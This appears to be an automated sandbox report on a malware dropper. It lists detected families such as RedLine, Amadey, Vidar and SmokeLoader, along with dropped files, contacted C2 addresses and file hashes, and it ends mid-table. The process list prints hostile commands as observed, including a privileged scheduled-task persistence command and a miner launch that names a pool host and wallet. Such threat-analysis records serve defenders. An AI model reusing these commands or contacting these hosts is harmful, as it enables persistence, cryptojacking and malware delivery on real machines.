Analysis Overview
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
Threat Level: Known bad
The file 4363463463464363463463463.bin was found to be: Known bad.
Malicious Activity Summary
Detect ZGRat V1
RedLine
Amadey
SmokeLoader
MetaSploit
Suspicious use of NtCreateUserProcessOtherParentProcess
RedLine payload
Detect Xworm Payload
Xworm
Rhadamanthys
Detect Vidar Stealer
Vidar
ZGRat
Detects executables packed with unregistered version of .NET Reactor
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Detects executables packed with Themida
Detects Windows executables referencing non-Windows User-Agents
Detects binaries and memory artifacts referencing sandbox DLLs typically observed in sandbox evasion
Downloads MZ/PE file
Blocklisted process makes network request
.NET Reactor proctector
Themida packer
Executes dropped EXE
Checks BIOS information in registry
Loads dropped DLL
Uses the VBS compiler for execution
Checks computer location settings
Adds Run key to start application
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Checks whether UAC is enabled
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Drops file in Windows directory
Program crash
Enumerates physical storage devices
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Delays execution with timeout.exe
Suspicious behavior: EnumeratesProcesses
Runs ping.exe
Creates scheduled task(s)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-02-10 18:51
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-02-10 18:51
Reported
2024-02-10 18:54
Platform
win7-20231129-en
Max time kernel
7s
Max time network
149s
Command Line
Signatures
Amadey
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
MetaSploit
SmokeLoader
Vidar
ZGRat
Detects binaries and memory artifacts referencing sandbox DLLs typically observed in sandbox evasion
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables packed with unregistered version of .NET Reactor
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
.NET Reactor proctector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\native.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\plink.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
Uses the VBS compiler for execution
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Files\32.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Files\build2.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Files\native.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
C:\Users\Admin\AppData\Local\Temp\Files\32.exe
"C:\Users\Admin\AppData\Local\Temp\Files\32.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2112 -s 64
C:\Users\Admin\AppData\Local\Temp\Files\native.exe
"C:\Users\Admin\AppData\Local\Temp\Files\native.exe"
C:\Users\Admin\AppData\Local\Temp\Files\ama.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ama.exe"
C:\Users\Admin\AppData\Local\Temp\Files\plink.exe
"C:\Users\Admin\AppData\Local\Temp\Files\plink.exe"
C:\Users\Admin\AppData\Local\Temp\Files\build2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\build2.exe"
C:\Users\Admin\AppData\Local\Temp\Files\build2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\build2.exe"
C:\Users\Admin\AppData\Local\Temp\Files\cs_maltest.exe
"C:\Users\Admin\AppData\Local\Temp\Files\cs_maltest.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Eszop.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Eszop.exe"
C:\Users\Admin\AppData\Local\Temp\Files\r.exe
"C:\Users\Admin\AppData\Local\Temp\Files\r.exe"
C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"
C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
"C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe"
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp780D.tmp.bat""
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2808 -s 1380
C:\Users\Admin\AppData\Local\Temp\Files\RobluxCoins.exe
"C:\Users\Admin\AppData\Local\Temp\Files\RobluxCoins.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
C:\Windows\system32\WerFault.exe
WerFault
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
C:\Users\Admin\AppData\Local\Temp\Files\%E5%88%9D%E5%A6%86%E5%8A%A9%E6%89%8B.exe
"C:\Users\Admin\AppData\Local\Temp\Files\%E5%88%9D%E5%A6%86%E5%8A%A9%E6%89%8B.exe"
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
"C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
C:\Users\Admin\AppData\Local\Temp\is-RV3JG.tmp\%E5%88%9D%E5%A6%86%E5%8A%A9%E6%89%8B.tmp
"C:\Users\Admin\AppData\Local\Temp\is-RV3JG.tmp\%E5%88%9D%E5%A6%86%E5%8A%A9%E6%89%8B.tmp" /SL5="$301E0,1495449,832512,C:\Users\Admin\AppData\Local\Temp\Files\%E5%88%9D%E5%A6%86%E5%8A%A9%E6%89%8B.exe"
C:\Users\Admin\AppData\Local\Temp\Files\hv.exe
"C:\Users\Admin\AppData\Local\Temp\Files\hv.exe"
C:\Users\Admin\AppData\Local\Temp\Files\bin.exe
"C:\Users\Admin\AppData\Local\Temp\Files\bin.exe"
C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe"
C:\Users\Admin\AppData\Local\Temp\Files\bin.exe
"C:\Users\Admin\AppData\Local\Temp\Files\bin.exe"
C:\Users\Admin\AppData\Local\Temp\Files\e756885f12abdf5cc8450232691a4f55c1e524262825a4a00ced4f004a2c69c1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\e756885f12abdf5cc8450232691a4f55c1e524262825a4a00ced4f004a2c69c1.exe"
C:\Users\Admin\AppData\Local\Temp\Files\e756885f12abdf5cc8450232691a4f55c1e524262825a4a00ced4f004a2c69c1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\e756885f12abdf5cc8450232691a4f55c1e524262825a4a00ced4f004a2c69c1.exe"
C:\Users\Admin\AppData\Local\Temp\Files\rty45.exe
"C:\Users\Admin\AppData\Local\Temp\Files\rty45.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Winlock.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Winlock.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe"
C:\Windows\SysWOW64\cmd.exe
/c del "C:\Users\Admin\AppData\Local\Temp\Files\bin.exe"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x308
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.2.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| NL | 193.176.31.152:81 | 193.176.31.152 | tcp |
| US | 8.8.8.8:53 | mistitis.ug | udp |
| RU | 91.215.85.223:80 | mistitis.ug | tcp |
| GB | 5.148.32.222:6789 | 5.148.32.222 | tcp |
| DE | 185.172.128.154:80 | 185.172.128.154 | tcp |
| US | 8.8.8.8:53 | brusuax.com | udp |
| ET | 196.188.169.138:80 | brusuax.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.4:80 | github.com | tcp |
| DE | 140.82.121.4:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| RU | 178.159.36.155:80 | 178.159.36.155 | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| DE | 185.172.128.32:80 | 185.172.128.32 | tcp |
| US | 8.8.8.8:53 | marksidfgs.ug | udp |
| RU | 91.215.85.223:80 | marksidfgs.ug | tcp |
| FI | 95.217.243.137:80 | 95.217.243.137 | tcp |
| FI | 95.217.243.137:80 | 95.217.243.137 | tcp |
| FI | 95.217.243.137:80 | 95.217.243.137 | tcp |
| US | 8.8.8.8:53 | vmi1159541.contaboserver.net | udp |
| US | 209.145.51.44:80 | vmi1159541.contaboserver.net | tcp |
| US | 8.8.8.8:53 | static.cz01.cn | udp |
| GB | 163.171.144.40:80 | static.cz01.cn | tcp |
| VN | 103.68.85.20:80 | 103.68.85.20 | tcp |
| US | 8.8.8.8:53 | scientific.pk | udp |
| RU | 91.215.85.223:80 | scientific.pk | tcp |
| CN | 47.99.151.68:1302 | tcp | |
| CN | 47.98.224.91:80 | tcp | |
| CN | 106.55.199.146:8088 | tcp | |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.169.78:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | pki.goog | udp |
| US | 216.239.32.29:80 | pki.goog | tcp |
| DE | 140.82.121.4:443 | github.com | tcp |
| US | 8.8.8.8:53 | ji.alie3ksggg.com | udp |
| HK | 154.92.15.189:80 | ji.alie3ksggg.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.180.1:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | i.alie3ksgaa.com | udp |
| HK | 154.92.15.189:443 | i.alie3ksgaa.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 96.17.179.205:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | www.hseda.com | udp |
| CN | 211.149.230.178:80 | www.hseda.com | tcp |
| US | 8.8.8.8:53 | host-file-host6.com | udp |
| US | 172.67.172.189:80 | host-file-host6.com | tcp |
| US | 8.8.8.8:53 | host-host-file8.com | udp |
| RU | 185.12.126.182:80 | host-host-file8.com | tcp |
| DE | 185.172.128.11:80 | 185.172.128.11 | tcp |
| US | 8.8.8.8:53 | app.alie3ksgaa.com | udp |
| HK | 154.92.15.189:80 | app.alie3ksgaa.com | tcp |
Files
memory/1716-0-0x0000000000B40000-0x0000000000B48000-memory.dmp
memory/1716-1-0x0000000074B40000-0x000000007522E000-memory.dmp
memory/1716-2-0x0000000004B40000-0x0000000004B80000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\Local\Temp\Tar2918.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | b57ca78cb9df252ed98b88b2228d3617 |
| SHA1 | bc9e02b214bac1a884b2d875c95a4b3ce962ced1 |
| SHA256 | 2c4012ea929bc2fa44efbec208d3fc3c2aef8fea79e0982f3a83a188adeee10e |
| SHA512 | ecc18487c015bbfe162bc0cefcf30dff778dae8690323e6df018556dad123390990b1226374043957c84ea28010c3e613f7688b895897feac9bf497ba3ef7c37 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | a266bb7dcc38a562631361bbf61dd11b |
| SHA1 | 3b1efd3a66ea28b16697394703a72ca340a05bd5 |
| SHA256 | df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e |
| SHA512 | 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc |
\Users\Admin\AppData\Local\Temp\Files\32.exe
| MD5 | fb003fc48dbad9290735c9a6601381f7 |
| SHA1 | 49086b4036de3d990d0120697553f686091b2cd9 |
| SHA256 | 9b7110edf32f235d590b8141ba6aa81eb3414e3202ff0feefcb2160e655c0116 |
| SHA512 | 690877ca9798f1b6bbf67199fa55d939428b87888d99e2f730cad4b1aa0d37938622ce265a19fac2e0778237bf6fe1bc0cb773d5f7be5219800ad4a3d850604b |
\Users\Admin\AppData\Local\Temp\Files\native.exe
| MD5 | 1a917a85dcbb1d3df5f4dd02e3a62873 |
| SHA1 | 567f528fec8e7a4787f8c253446d8f1b620dc9d6 |
| SHA256 | 217fbf967c95d1359314fcd53ae8d04489eb3c7bdc1f22110d5a8a476d1fc92e |
| SHA512 | 341acbd43efac1718c7f3e3795549acf29237a2675bdadcb7e52ce18aac6dcc6ae628e1b6edfa2338ed6d9923c148cb4322c75fad86d5c0e6f2327c2270563ec |
C:\Users\Admin\AppData\Local\Temp\Files\native.exe
| MD5 | 853263c99d2209de04dc14a54da89fc6 |
| SHA1 | c859c7ec0cdc5b06a49b83396d157c4dae3d6af3 |
| SHA256 | 1726fedeb53ef2333784eae9153f7a9cd3d42ee92c6c5fc0f478963f4ff6d8cd |
| SHA512 | 8786a0f0aae19e2e972a21f3e1b17c58006bbb64c8e8cc8dd6e541bf2f53b77d668b0a242ffc0912169c441ac2023d99b101f6a321991368b83d9ba3073c0ff3 |
memory/1136-89-0x0000000074B40000-0x000000007522E000-memory.dmp
memory/1136-88-0x0000000001030000-0x0000000001258000-memory.dmp
memory/1136-90-0x0000000004C00000-0x0000000004E08000-memory.dmp
memory/1136-91-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-94-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-100-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-102-0x0000000004C00000-0x0000000004E03000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\plink.exe
| MD5 | 7e559dc4e162f6aaee6a034fa2d9c838 |
| SHA1 | 43c3e4563c3c40884d7ff7d0d99c646943a1a9fd |
| SHA256 | 4c2e05acad9e625ba60ca90fa7cce6a1b11a147e00f43e0f29225faeff6b54aa |
| SHA512 | 160ca1d23ae3f7e8369ce4706bd1665e4f48ee4fc2eb8b4429437decfa20f618fdbe47b4d290e3b320ca1a826e4f7002b78667d00a13dba5a169ecb06ef50749 |
memory/1136-112-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-117-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-119-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-115-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-121-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-123-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-125-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/2716-127-0x0000000000230000-0x0000000000231000-memory.dmp
memory/2716-129-0x0000000000230000-0x0000000000231000-memory.dmp
memory/1136-135-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-139-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-143-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-147-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-149-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-145-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-151-0x0000000004C00000-0x0000000004E03000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\ama.exe
| MD5 | 90a7bc4a429e25ba88d41eee8061e69e |
| SHA1 | a270e6867863a52b314bb6eb004f8dc49cb3e70b |
| SHA256 | a0606a6e530ddcef7cd63bf01c7f28c314b38240460456ca6c34ce9bc44c7763 |
| SHA512 | d906f310a32ba6019b5d425455e7b6875475da5ce0a9e61469e62b4532cc94abb58696432b832831fd2347211034f0d78dab871d7af658054f62f5d6625da0b2 |
memory/1136-168-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-166-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-170-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-172-0x0000000004C00000-0x0000000004E03000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\ama.exe
| MD5 | 90382e2dd2ab757bf72666538bb988fb |
| SHA1 | 0237680ac12030e7b40a51d3b9b3351ab0d88f6e |
| SHA256 | 6156756a8527c4e51f6a02a1f39f72fa2857e241004d8ba05d0658832456b34a |
| SHA512 | 0300850c601f430a62901c9f5f948d1ddf36a42df1ba656a98dd0ed6e9df2a0e8286640bffee2b6a1af226d49e5704dc4bece24a0b5e9a1a43fccbd1446cbc3d |
\Users\Admin\AppData\Local\Temp\Files\ama.exe
| MD5 | ce3ea16e1159f4fc88aecf88aaa65d74 |
| SHA1 | 0e10ec0e388f0c5b50e874dfe9043b259b128e84 |
| SHA256 | c6e0d9adfec451041caefaa228dc0b9fe920cfe6e6feb12d7b04fc3a9dde2731 |
| SHA512 | 9cda6db9e8e2aaa78024c9227c04db08c4cc7a3714374108a5bd559157672d80a502bc2ba4485e8c8ed461d6bd4b9207865756aa249f1bc31e13db2d2e04f24d |
\Users\Admin\AppData\Local\Temp\Files\ama.exe
| MD5 | 71bc5aae999c6cb4afd59137e93ba217 |
| SHA1 | 2409bba3d33504ab9d78e791b23940aae47c96ba |
| SHA256 | a30854a7cdf0e5ae4bd59fc78e09e8a0352356e47620be6f6e8e979fbdea0a63 |
| SHA512 | f2210770237ad03f3753ff0881b99ca449b3554d63d5eaac28fb05ac664954bccd31c4990ec8c2a0ba6064a362b0058e0f57de8e2ccd8b606f10295aa1bb2a0d |
memory/1136-164-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-162-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-153-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-137-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-133-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-131-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-128-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-98-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-96-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-92-0x0000000004C00000-0x0000000004E03000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\build2.exe
| MD5 | a0cc1241aa4803dc23ff778af73e3768 |
| SHA1 | 75d07c8f1784e8e64e7520c2666bc63c2a477ffa |
| SHA256 | c0b12bbdcb41f6941d4356309fd8a43f61cbfd18eee044ff1771cbdbba248466 |
| SHA512 | 3ccb46eca07827f5c86b31da5f7ab1b4a4b80f0cf3c1f8245c9ea57cf7c2244bc5f867a09696ce1c80cce38c631c7f6a13dca537b8e4b297735324f52cabb755 |
\Users\Admin\AppData\Local\Temp\Files\build2.exe
| MD5 | 8dbe4455b90ea13ebed8a2c0b82ee946 |
| SHA1 | a52eeb41ee54c2e4c2bb3f9acc4736a8b63d7d83 |
| SHA256 | 4f76248f31947b55b87ba31fa355925e5f03bbd74602d701ef965c7ff339d90f |
| SHA512 | 8081340f4b00e208962306c6d7abf89d6e18477925d47b6f4eccfdf7bf1b3f07d74c90a344740d48f7af4e1e434921e96784e6be5e27c4f27d85e8e4e2bcc3bb |
memory/2172-440-0x00000000002C0000-0x00000000003C0000-memory.dmp
memory/2172-441-0x0000000000280000-0x00000000002B1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\build2.exe
| MD5 | 6ebc6be56ffc0574650ace621e91a95f |
| SHA1 | 436cbd187f201ddd3f565e26885fc951483bc60b |
| SHA256 | b70f0bad345b154dea3b21e2afed5f0088b73905a38f05850e6090c2116b509f |
| SHA512 | f6c1cab4414ab1a4db885e4e6918af6e81ab97e6cecd5d3b97e2fc834c99b35b4586df7de6aea112d3730c8c3d0608e03aa8e60018371dbb7d6805b4c4767220 |
\Users\Admin\AppData\Local\Temp\Files\build2.exe
| MD5 | 83a20f6b751cf88a90a2de3ff9c36b16 |
| SHA1 | 8441270837832fca23aa606e995fd9118876a062 |
| SHA256 | 550ab9c6be1fdec2ece55072778a8d09c47ac5978c99965bc3a09e5b35dd7841 |
| SHA512 | c6efcfffe12ad08aaccd255196fbea84f053e2686f04a9842b6449a1650d94a7de6884b8c019ffd96f607d71c6ef7f35aeffdeba68e2e3d512b213bb67ab2852 |
memory/2808-455-0x0000000000400000-0x0000000000644000-memory.dmp
\Users\Admin\AppData\Local\Temp\Files\cs_maltest.exe
| MD5 | ab13d611d84b1a1d9ffbd21ac130a858 |
| SHA1 | 336a334cd6f1263d3d36985a6a7dd15a4cf64cd9 |
| SHA256 | 7b021b996b65f29cae4896c11d3a31874e2d5c4ce8a7a212c8bedf7dcae0f8ae |
| SHA512 | c608c3cba7fcad11e6e4ae1fc17137b95ee03b7a0513b4d852405d105faf61880da9bf85b3ce7c1c700adedbf5cdccaae01e43a0345c3f1ee01b639960de877f |
memory/2772-721-0x0000000000020000-0x0000000000021000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\Eszop.exe
| MD5 | 9379b6e19fb3154d809f8ad97ff03699 |
| SHA1 | b6e4e709a960fbb12c05c97ed522d59da8a2decb |
| SHA256 | e97b0117c7dc1aeb1ef08620ed6833ee61d01ce17c1e01f08aa2a51c5278beca |
| SHA512 | b181ccc6811f788d3a24bb6fa36b516f2c20d1258fecec03a0429f8ab3fd4b74fc336bfec1b9d1f5f01532ae6f665bfaac4784cab5b8b20fd8ee31a11d551b21 |
C:\Users\Admin\AppData\Local\Temp\Files\Eszop.exe
| MD5 | dfd712f2777f0f14ef5aa473deb2da73 |
| SHA1 | 29f5520cd0717c34b8735ad8cffe938b9d3572ce |
| SHA256 | bbfa6a07c9cba1d645b8ceb275bb4f38f739080186c838fae31cf5955ad13039 |
| SHA512 | 1950de1e0334293c8681ca3a23e391862b635535d8167732365e8fb45a925b502e51f26ede09a12b395f025adfac3745dae1791e8594f5feb50dd5737fb4dd58 |
\Users\Admin\AppData\Local\Temp\Files\Eszop.exe
| MD5 | 60700276d860f636e9b9adf6be40d471 |
| SHA1 | 64dde727e823658496601c1ca8919e4ac896b430 |
| SHA256 | 7193c52953b1f3f7343e9c3db9179bee8ec03c22b73c489aa9837dc3e5880443 |
| SHA512 | 3cb025a313f0f0c906a6f9ebf8675c5bacb85c53a2bb0a5b8e6b6e3ea88dfb820b5710381a79db74f44ae6571f0449c62f4550fdcedd603dc698e637157323cc |
memory/1796-822-0x000000013F7F0000-0x000000013F868000-memory.dmp
memory/1796-893-0x000000001B4C0000-0x000000001B560000-memory.dmp
\Users\Admin\AppData\Local\Temp\Files\r.exe
| MD5 | b3db8db328d89d5d301bdabd65901c33 |
| SHA1 | f18c01ee928be6ca78968d9e1478c0d5bcd805c9 |
| SHA256 | 98bae997d1e2fc6b793a25536f907d66157e741264db635c470ace0311c70b30 |
| SHA512 | c9d95f418ad4e0816d383664f38cc3b67d77909c4b999fac9e0535aa6d275e120ae204abc3ba787592568d47fdf1ddb7321c7a8b37600777fc890a6b4fc7230b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2c3c127492e090a9452e1d7158e1b409 |
